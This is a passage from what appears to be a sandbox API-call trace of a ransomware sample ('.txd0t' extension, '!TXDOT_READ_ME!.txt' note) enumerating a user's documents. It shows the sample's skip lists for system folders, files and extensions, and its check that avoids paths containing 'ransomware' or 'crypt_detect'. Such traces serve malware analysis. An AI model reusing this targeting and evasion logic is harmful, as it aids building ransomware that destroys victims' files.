(in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.592] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.592] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.601] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.601] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\ivPZqJfxmHT.pps" [0074.601] SetEvent (hEvent=0x418) returned 1 [0074.602] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0xeff63c00, ftLastAccessTime.dwHighDateTime=0x1d5ee94, ftLastWriteTime.dwLowDateTime=0xeff63c00, ftLastWriteTime.dwHighDateTime=0x1d5ee94, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="jDtkUz0kU8", cAlternateFileName="JDTKUZ~1")) returned 1 [0074.602] StrCmpW (psz1="jDtkUz0kU8", psz2=".") returned 1 [0074.602] StrCmpW (psz1="jDtkUz0kU8", psz2="..") returned 1 [0074.602] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0074.602] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\" [0074.602] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\", psz2="jDtkUz0kU8", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\system32\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\system\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\local\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\boot\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\perflogs\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\programdata\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\drivers\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\wsus\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="crypt_detect") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="cryptolocker") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="ransomware") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\WINDOWS") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.602] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", lpSrch="C:\\Program Files") returned 0x0 [0074.602] GetProcessHeap () returned 0xe30000 [0074.602] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4e4) returned 0xed46d0 [0074.603] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0074.603] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\*", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*" [0074.603] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\*", lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0xeff63c00, ftLastAccessTime.dwHighDateTime=0x1d5ee94, ftLastWriteTime.dwLowDateTime=0xeff63c00, ftLastWriteTime.dwHighDateTime=0x1d5ee94, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2470 [0074.603] StrCmpW (psz1=".", psz2=".") returned 0 [0074.603] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2f46f3c0, ftCreationTime.dwHighDateTime=0x1d5ea50, ftLastAccessTime.dwLowDateTime=0xeff63c00, ftLastAccessTime.dwHighDateTime=0x1d5ee94, ftLastWriteTime.dwLowDateTime=0xeff63c00, ftLastWriteTime.dwHighDateTime=0x1d5ee94, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.603] StrCmpW (psz1="..", psz2=".") returned 1 [0074.603] StrCmpW (psz1="..", psz2="..") returned 0 [0074.603] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd4b9150, ftCreationTime.dwHighDateTime=0x1d5e525, ftLastAccessTime.dwLowDateTime=0xea2cfea0, ftLastAccessTime.dwHighDateTime=0x1d5eb86, ftLastWriteTime.dwLowDateTime=0xea2cfea0, ftLastWriteTime.dwHighDateTime=0x1d5eb86, nFileSizeHigh=0x0, nFileSizeLow=0x18185, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="8GgGCWAXxjKLpeoA40OY.odp", cAlternateFileName="8GGGCW~1.ODP")) returned 1 [0074.603] StrCmpW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2=".") returned 1 [0074.603] StrCmpW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="..") returned 1 [0074.603] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0074.603] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0074.603] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="8GgGCWAXxjKLpeoA40OY.odp", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp" [0074.603] PathFindExtensionW (pszPath="8GgGCWAXxjKLpeoA40OY.odp") returned=".odp" [0074.604] StrCmpW (psz1=".odp", psz2=".txd0t") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="bootsect.bak") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="iconcache.db") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="thumbs.db") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2=" ransomware ") returned 1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2=" ransom ") returned 1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="debug.txt") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="boot.ini") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="desktop.ini") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="autorun.inf") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="ntuser.dat") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="ntldr") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="ntdetect.com") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="bootfont.bin") returned -1 [0074.604] StrCmpIW (psz1="8GgGCWAXxjKLpeoA40OY.odp", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.604] PathFindExtensionW (pszPath="8GgGCWAXxjKLpeoA40OY.odp") returned=".odp" [0074.604] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odp") returned 0x0 [0074.604] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.604] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.604] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.613] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.613] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\8GgGCWAXxjKLpeoA40OY.odp" [0074.613] SetEvent (hEvent=0x418) returned 1 [0074.613] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbbf0b10, ftCreationTime.dwHighDateTime=0x1d5f0f0, ftLastAccessTime.dwLowDateTime=0xe1aa4ee0, ftLastAccessTime.dwHighDateTime=0x1d5e1db, ftLastWriteTime.dwLowDateTime=0xe1aa4ee0, ftLastWriteTime.dwHighDateTime=0x1d5e1db, nFileSizeHigh=0x0, nFileSizeLow=0x7ecf, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="hnSSITWu7H4.odt", cAlternateFileName="HNSSIT~1.ODT")) returned 1 [0074.613] StrCmpW (psz1="hnSSITWu7H4.odt", psz2=".") returned 1 [0074.613] StrCmpW (psz1="hnSSITWu7H4.odt", psz2="..") returned 1 [0074.613] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0074.613] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0074.613] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="hnSSITWu7H4.odt", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt" [0074.613] PathFindExtensionW (pszPath="hnSSITWu7H4.odt") returned=".odt" [0074.613] StrCmpW (psz1=".odt", psz2=".txd0t") returned -1 [0074.613] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="bootsect.bak") returned 1 [0074.613] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="iconcache.db") returned -1 [0074.613] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="thumbs.db") returned -1 [0074.613] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2=" ransomware ") returned 1 [0074.613] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2=" ransom ") returned 1 [0074.613] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="debug.txt") returned 1 [0074.614] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="boot.ini") returned 1 [0074.614] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="desktop.ini") returned 1 [0074.614] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="autorun.inf") returned 1 [0074.614] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="ntuser.dat") returned -1 [0074.614] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="ntldr") returned -1 [0074.614] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="ntdetect.com") returned -1 [0074.614] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="bootfont.bin") returned 1 [0074.614] StrCmpIW (psz1="hnSSITWu7H4.odt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.614] PathFindExtensionW (pszPath="hnSSITWu7H4.odt") returned=".odt" [0074.614] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odt") returned 0x0 [0074.614] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.614] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.614] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0074.628] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.628] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\hnSSITWu7H4.odt" [0074.628] SetEvent (hEvent=0x418) returned 1 [0074.629] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43a94a60, ftCreationTime.dwHighDateTime=0x1d5ed12, ftLastAccessTime.dwLowDateTime=0x464da5e0, ftLastAccessTime.dwHighDateTime=0x1d5e600, ftLastWriteTime.dwLowDateTime=0x464da5e0, ftLastWriteTime.dwHighDateTime=0x1d5e600, nFileSizeHigh=0x0, nFileSizeLow=0x498c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="j7-b.pdf", cAlternateFileName="")) returned 1 [0074.629] StrCmpW (psz1="j7-b.pdf", psz2=".") returned 1 [0074.629] StrCmpW (psz1="j7-b.pdf", psz2="..") returned 1 [0074.629] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0074.629] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0074.629] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="j7-b.pdf", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf" [0074.629] PathFindExtensionW (pszPath="j7-b.pdf") returned=".pdf" [0074.629] StrCmpW (psz1=".pdf", psz2=".txd0t") returned -1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="bootsect.bak") returned 1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="iconcache.db") returned 1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="thumbs.db") returned -1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2=" ransomware ") returned 1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2=" ransom ") returned 1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="debug.txt") returned 1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="boot.ini") returned 1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="desktop.ini") returned 1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="autorun.inf") returned 1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="ntuser.dat") returned -1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="ntldr") returned -1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="ntdetect.com") returned -1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="bootfont.bin") returned 1 [0074.629] StrCmpIW (psz1="j7-b.pdf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.629] PathFindExtensionW (pszPath="j7-b.pdf") returned=".pdf" [0074.629] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".pdf") returned 0x0 [0074.629] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.629] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.629] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.636] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.636] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\j7-b.pdf" [0074.636] SetEvent (hEvent=0x3fc) returned 1 [0074.636] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcadeab70, ftCreationTime.dwHighDateTime=0x1d5e9c4, ftLastAccessTime.dwLowDateTime=0xa568d710, ftLastAccessTime.dwHighDateTime=0x1d5ebbf, ftLastWriteTime.dwLowDateTime=0xa568d710, ftLastWriteTime.dwHighDateTime=0x1d5ebbf, nFileSizeHigh=0x0, nFileSizeLow=0x72c4, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="LFpWuQJ-aF.doc", cAlternateFileName="LFPWUQ~1.DOC")) returned 1 [0074.636] StrCmpW (psz1="LFpWuQJ-aF.doc", psz2=".") returned 1 [0074.637] StrCmpW (psz1="LFpWuQJ-aF.doc", psz2="..") returned 1 [0074.637] StrCpyNW (in: psz1=0xed46d0, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8" [0074.637] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8", psz2="\\", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\" [0074.637] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\", psz2="LFpWuQJ-aF.doc", cchMax=1124 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\jDtkUz0kU8\\LFpWuQJ-aF.doc" [0074.637] PathFindExtensionW (pszPath="LFpWuQJ-aF.doc") returned=".doc" [0074.637] StrCmpW (psz1=".doc", psz2=".txd0t") returned -1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="bootsect.bak") returned 1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="iconcache.db") returned 1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="thumbs.db") returned -1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2=" ransomware ") returned 1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2=" ransom ") returned 1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="debug.txt") returned 1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="boot.ini") returned 1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="desktop.ini") returned 1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="autorun.inf") returned 1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="ntuser.dat") returned -1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="ntldr") returned -1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="ntdetect.com") returned -1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="bootfont.bin") returned 1 [0074.637] StrCmpIW (psz1="LFpWuQJ-aF.doc", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.637] PathFindExtensionW (pszPath="LFpWuQJ-aF.doc") returned=".doc" [0074.637] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".doc") returned 0x0 [0074.637] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0074.637] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0074.637] WaitForMultipleObjects (nCount=0x4, 